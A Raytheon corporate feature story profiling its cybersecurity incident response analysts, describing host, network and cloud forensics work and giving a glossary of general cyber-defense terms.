For code and country
Raytheon’s cybersecurity incident response teams mitigate attacks against US
In the suburbs of Washington, D.C., morning sunlight illuminates an array of computer monitors in a home office.
Far from flickering screens in dark rooms often seen in Hollywood’s portrayal of cyber defenders, this is the real-world workspace of Daniel, a cybersecurity analyst lead with a Raytheon cybersecurity incident response team.
Rather than a clandestine bunker, analysts like Daniel often work from home. Together with his team – many working remotely across the country – they protect the U.S.’ digital infrastructure from a myriad of cyber threats.
“We are involved in a lot that keeps the American way of life running, and we fight all kinds of actors,” said Daniel. “Every day brings something new. It’s a lot of fun. The job is a giant puzzle, and I like that aspect of it.”
Behind the screens with the real cyber CSI
Part of the team’s work is known as host forensics, the practice of examining systems such as desktops, laptops and mobile devices to discover evidence of cyber incidents. By analyzing logs, metadata, file systems and more, the team can uncover an attack and assess the damage. Raytheon’s cyber incidence response teams are well known in this field, possessing the expertise and tools to address intricate cybersecurity problems.
The rise of remote work has opened new opportunities for attackers, particularly those acting on behalf of nations vying for dominance in the information realm.
“The volume and scope of what cybersecurity professionals must deal with are daunting. We’ve gone from being secure by implementing firewalls to now analyzing large volumes of data,” said Julian Zottl, chief technology officer for Cyber Protection Solutions at Raytheon. “Cybersecurity has gone from an IT implementation to a big-data engineering problem very quickly.”
Digital Defense Dictionary
Artifacts: Digital traces left by activities on a computer system. Like clues at a crime scene, analysts use them to figure out a cyberattack.
Bad actor: Individuals or groups that attack or exploit computer systems maliciously.
Burn a bad actor: Disrupting an attacker’s operations by revealing their tactics, techniques and tools to the public.
C2: Short for command and control, it is the means attackers use to control compromised systems.
Cyber threat: Actions that could damage or break into computer systems or networks.
Data exfiltration: Stealing data from a system, usually for selling or misusing.
Denial-of-Service attack: Overwhelming a system with traffic, causing disruption.
Encryption: Scrambling data using a secret code, preventing unauthorized access.
Hunt: Searching digital systems to find threats.
Incident response: Fixing and restoring a system after an attack, keeping downtime low.
Intrusion detection system: Like a home security system, it monitors network activities for intruders.
Living off the land: Attackers using existing, legitimate tools on a system for malicious activity, making detection difficult.
Malware: Software designed to harm or steal information from digital systems.
Needle in a stack of needles: That one malicious bit of code in a sea of data.
Social engineering: Tricking users into compromising security or revealing sensitive information.
SolarWinds incident: In late 2020, bad actors concealed malicious code in a routine software update from U.S.-based company SolarWinds, infecting computers worldwide and underscoring the sophistication and impact of cyber threats.
TTPs: Tactics, techniques and procedures —the way hackers plan, execute and manage attacks.
Two-Factor authentication: Double-checking identity using two separate methods, like a password and phone code.
Zero-Day vulnerability: A system or software vulnerability that even the makers don’t know about, ripe for exploitation by attackers.
Host forensics:
- Analyzes individual systems such as desktops and laptops.
- Uncovers digital evidence like logs and metadata.
- Investigates user activities and software to trace attacks.
- Identifies the source, actions taken, and extent of a breach.
Network forensics:
- Monitors and analyzes network traffic for threats.
- Utilizes tools like packet captures and flow records.
- Examines IP addresses and protocols to detect intrusions.
- Reveals the scope and sources of malicious network activities.
Cloud forensics:
- Investigates digital evidence within cloud environments.
- Extracts data from virtual machines and cloud applications.
- Navigates unique challenges of distributed and shared resources.
- Uncovers unauthorized access, data breaches, or other malicious activities.
Collaboration and automation in a matrix of malware
“Every day presents a new challenge,” said Jack, a cybersecurity analyst technical lead. “Sometimes we’re handed a hard drive with minimal information, other times we’re in environments with tens of thousands of systems to analyze.”
Jack explains how crucial collaborating is, emphasizing how team dynamics help ensure nothing is overlooked.
“My colleagues will be sitting there looking at the same data set, and they’re going to find something I may have missed. It’s knowing each other’s strong points and playing off each other,” Jack said.
Raytheon is investing in automation to discover and analyze incidents faster, eliminate human error and produce actionable intelligence faster.
Automating rote tasks frees up the team to use their critical-thinking skills and work more closely with customers, tailoring their approach based on the specifics of an incident and the complexity of the network.
“If industrial control systems are involved, we bring in our specialists in that domain,” said James, a cyber incident response manager. “Likewise, if it’s a cloud infrastructure issue, our cloud experts step in.”
Looking for a needle in a stack of needles
Regina is a cybersecurity analyst lead, overseeing more than 30 team members. Her analysts comb through data to look for evidence of cyberattacks, uncovering anomalies and finding any intrusions.
“It’s like searching for a needle in a stack of needles,” Regina said.
Some of the hardest intrusions to detect are those designed to happen quietly and invisibly. A tactic employed by attackers called “living off the land,” uses tools native to the environment, so as not to create an anomaly and thus avoid detection.
“It blurs the line between legitimate activity and potential threats,” said Joseph, a cybersecurity analyst.
Regina and many of her colleagues have a saying: Bad actors only need to win once. We have to win every time.
“The bad guys often have the upper hand because they operate without any rules, while we, as the defenders, must operate within strict boundaries,” she said.
Each day presents a different challenge for Regina and her team, from misconfigured servers and insecure edge devices to potential breaches that require swift action. However, it is not just about reacting to problems as they arise; it is also about proactively hunting down vulnerabilities and strengthening security measures.
From the team
Burning bad actors
Raytheon’s focus goes beyond finding and mitigating cyberattacks. By publishing findings about identified threats, the team not only fortifies defenses but also disrupts adversaries’ operations.
“The most rewarding part of my job is when we can ‘burn’ an adversary’s infrastructure and their tactics, and we make them public knowledge,” Daniel said. “It causes a significant disruption in their operations, forcing them to invest resources in creating new tools or tactics.”
Within the realm of cloud forensics, Raytheon’s cybersecurity incident response teams confront unique challenges. While host forensics and network forensics teams often rely on on-site investigations, Raytheon’s cloud-centric approach allows the team to work with customers remotely, which brings several advantages.
“Our ability to remotely assist customers in making critical configuration changes expedites our response time,” said Mackenzie, a cybersecurity analyst. “We work closely with organizations to secure their cloud portals, grant permissions and use powerful tools for data collection and analytics. It’s a perk of the job when everything falls into place.”
According to Mackenzie, it’s a huge mission, and the responsibility can be overwhelming at times. And while threats loom large, their commitment to securing their customer’s critical infrastructure is unwavering.
“There are days when you feel like you’re making a difference, making it more difficult for threat actors to carry out their malicious plans,” Mackenzie said. “There are moments that bring a sense of satisfaction, knowing that actions are being taken to hinder the adversaries’ ability to do their dirty deeds. That’s why I joined the mission and feel fortunate to work with talented teammates.”
Editor’s note: This feature story does not use the full names of the cyber defenders who work on the cybersecurity incident response teams for their privacy and security.
